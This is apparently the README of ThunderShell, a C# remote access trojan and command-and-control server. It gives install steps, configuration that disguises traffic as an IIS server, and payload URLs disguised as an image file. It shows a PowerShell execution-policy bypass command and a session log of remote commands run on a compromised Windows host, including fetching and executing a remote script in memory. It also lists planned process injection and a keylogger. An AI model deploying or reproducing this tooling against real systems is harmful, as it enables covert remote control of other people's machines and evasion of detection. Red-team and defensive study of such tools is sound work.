ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is employed here to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.
The "core" RAT doesn't require a second stage to be injected / loaded in memory.
Current release is 2.0.2
Cloning the repository
git clone https://github.com/Mr-Un1k0d3r/ThunderShell
ThunderShell itself uses Python2 and requires the following dependencies:.
apt install python
apt install redis-server
apt install mysql-server
apt install mono-dmcs
apt install python-redis
apt install python-mysqldb
apt install python-tabulate
Currently ThunderShell supports:
C#ascspowershellaspsC# exeasexe
default option is powershell ps
ThunderShell can be used through the CLI and the web interface (under development) and supports several users at the same time on both the web interface and the CLI.
The tool provides typical web traffic and error logs. Commands for every active session are saved on disk for future reference. The log folder structure contains each shell output sorted by date.
ThunderShell client supports threading, meaning you can execute several commands in parallel on your target. ThunderShell is handles this for you on both the client and the server.
(under development) ThunderShell allows you to configure the network request performed by the client by setting arbitrary headers and changing the format of the data sent to the server.
Example configuration file profile.json:
{
"headers": {
"X-Powered-By": "ASP.NET",
"X-AspNet-Version": "4.0.30319",
"Set-Cookie": "ASP.NET_SessionId={{random}}[32];"
},
"autocommands": ["whoami", "cmd /c set"],
"auto-interact": "on"
}
The {{random}}[size] syntax can be used to set arbitrary values at runtime.
The profile is loaded by the main configuration file shown below
The client is using a C# unmanaged approach to execute powershell code. This allows the user to execute arbitrary powershell commands directly on the shell, without invoking powershell.exe.
First, the configuration file needs to be configured properly. Here is an example of a configuration file default.json:
{
"redis-host": "localhost",
"redis-port": 6379,
"mysql-host": "localhost",
"mysql-user": "root",
"mysql-pass": "",
"mysql-port": "3306",
"http-host": "1.1.1.1",
"http-port": 1111,
"http-server": "Microsoft-IIS/7.5",
"http-download-path": "cat.png",
"http-default-404": "default.html",
"https-enabled": "off",
"https-cert-path": "cert.pem",
"encryption-key": "",
"max-output-timeout": 5,
"server-password": "",
"aliases": {
"myalias": ""
},
"cli-sync-delay": 5,
"http-profile": "profile.json"
}
The server-password and encryption-key are generated automatically on the first run.
The server, including the web interface, are started from the CLI:
$ python ThunderShell.py default.json MrUn1k0d3r -gui
default.json is the configuration file. MrUn1k0d3r is the username for the session. -gui launches the web interface.
Other user can start a CLI interface by adding the -notthpd switch to avoid trying to start the HTTP daemon a second time
If https-enabled is on, https-cert-path must point to a PEM file with this structure:
-----BEGIN RSA PRIVATE KEY-----
... (private key in base64 encoding) ...
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
... (certificate in base64 PEM encoding) ...
-----END CERTIFICATE-----
ThunderShell generates payloads through the web interface. The endpoint is defined by the http-download-path variable.
Based on the configuration file, to generate a payload simply browse to:
http://1.1.1.1:1111/cat.png
The endpoint supports several options that can be added to the url http://1.1.1.1:1111/cat.png/type/delay/
type supports only ps and exe for now. delay is the amount of sleep (in milliseconds) between each callback. Its default value is 10000 (10 seconds).
There are several way of executing the RAT on the target. One simple example is to use powershell:
http://1.1.1.1:1111/cat.png/ps/
Once the file is saved. Execute it using the following command
powershell -exec bypass import-module .\file.ps1
The executable can be used directly
http://1.1.1.1:1111/cat.png/exe/
The raw C# data can be downloaded and modified manually
http://1.1.1.1:1111/cat.png/cs/
The example below executes Windows and Powershell commmands directly without invoking powershell.exe. The fetch command is used to obfuscate the powershell script. The server will download the data from the link specified, then encrypt it using the RC4 key and send it to the client. The client will then perform decryption and execute the code avoiding network detection.
python ThunderShell.py default.json MrUn1k0d3r -gui
.#" =[ Thunder Shell 2.0.1 | RingZer0 Team ]=
.##"
.###" __ __ _________ __ __
###P ###| ###| ##########| ###| ###|
d########" ###| ###| ###| ###| ###|
****####" ###|_____###| ###|__ ###| ###|
.###" ############| ######| ###| ###|
.##" ###| ###| ###| ###| ###|
.#" ###| ###| ###|______ ###|_______ ###|_______
." ###| ###| ##########| ###########| ###########|
[-] install.lock not found
[*] Generating new keys
[+] Current Active session UUID is c8ab130e-9ec1-40d5-a5de-cb7c0ec9698a
[+] Starting web server on 192.168.17.129 port 8080
(Main)>>> help
Help Menu
=========
Commands Args Descriptions
---------- ------------------------------------ --------------------------------------------------------------------------------------------
list full List all active shells
interact id Interact with a session
show (password,key,error,http,event) rows Show server password, encryption key, errors, http or events log (default number of rows 10)
kill id kill shell (clear db only)
os command Execute command on the system (local)
purge force WARNING! Delete all the Redis DB
exit Exit the application
help
(Main)>>>
[+] Registering new shell DESKTOP-2JKIANV DESKTOP-2JKIANV\admin
[+] New shell ID 12 GUID is nDCCYACFWYrU6LwM
(Main)>>> interact 12
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>> help
Help Menu
=========
Commands Args Descriptions
---------- -------------- ------------------------------------------------------------
background Return to the main console
fetch In memory execution of a script and execute a command
exec path/url, cmd In memory execution of code (shellcode)
read path/url Read a file on the remote host
upload remote path Upload a file on the remote system
ps path/url, path List processes
inject pid, command Inject command into a target process (max length 4096)
alias key, value Create an alias to avoid typing the same thing over and over
delay milliseconds Update the callback delay
help show this help menu
List of built in aliases
------------------------
wmiexec Remote-WmiExecute utility
searchevent Search-EventForUser utility
List user defined aliases
--------------------------
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>>
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>> whoami
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>>
[+] [(CLI)MrUn1k0d3r] Sending command: whoami
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>>
[*] Command output:
desktop-2jkianv\admin
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>> cmd.exe /c ver
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>>
[+] [(CLI)MrUn1k0d3r] Sending command: cmd.exe /c ver
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>>
[*] Command output:
Microsoft Windows [Version 10.0.16299.431]
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>> $psversiontable
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>>
[+] [(CLI)MrUn1k0d3r] Sending command: $psversiontable
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>>
[*] Command output:
Name Value
---- -----
PSVersion 5.1.16299.431
PSEdition Desktop
PSCompatibleVersions {1.0, 2.0, 3.0, 4.0...}
BuildVersion 10.0.16299.431
CLRVersion 4.0.30319.42000
WSManStackVersion 3.0
PSRemotingProtocolVersion 2.3
SerializationVersion 1.1.0.1
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>> fetch https://raw.githubusercontent.com/Mr-Un1k0d3r/RedTeamPowershellScripts/master/scripts/Get-IEBookmarks.ps1 Get-IEBookmarks
[+] Fetching https://raw.githubusercontent.com/Mr-Un1k0d3r/RedTeamPowershellScripts/master/scripts/Get-IEBookmarks.ps1
[+] Executing Get-IEBookmarks
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>>
[+] [(CLI)MrUn1k0d3r] Sending command: function Get-IEBookmarks {
# Mr.Un1k0d3r - RingZer0 Team 2016
# Get IE bookmarks URL
BEGIN {
$path = [Environment]::GetFolderPath('Favorites')
Write-Output "[+] Bookmark are located in $($path)"
}
PROCESS {
Get-ChildItem -Recurse $path -Include "*.url" | ForEach {
$data = Get-Content $_.fullname | Select-String -Pattern URL
Write-Output $data
}
}
END {
Write-Output "[+] Process completed..."
}
}
;Get-IEBookmarks
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>>
[*] Command output:
[+] Bookmark are located in C:\Users\admin\Favorites
URL=http://go.microsoft.com/fwlink/p/?LinkId=255142
[+] Process completed...
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>>
You can customize the "error" page that is returned for each GET request by specifying your HTML template through the http-default-404 variable. The file needs to be placed in the html folder and dependencies (such as images) in the download folder. By default ThunderShell mimicks an IIS server and returns the default IIS server page.
Everything that is placed in the download folder can be downloaded from the web server. For example, /root/ThunderShell/download/evil.exe can be is available at: http://1.1.1.1:1111/evil.exe
Initial release
code rewrite from powershell to C# to add flexibility
multi threads and multiple shell now sync
payload generator support exe
custom response headers added
bug fix
auto install dependencies on first run
- Implement in-memory protection using C# and push / pull code there to avoid sending the data several times
- Implement different delivery methods
- Inject the PowerShell RAT into another process
- Fully integrated keylogger
Mr.Un1k0d3r @MrUn1k0d3r
Tazz0 @Tazz019
RingZer0 Team 2017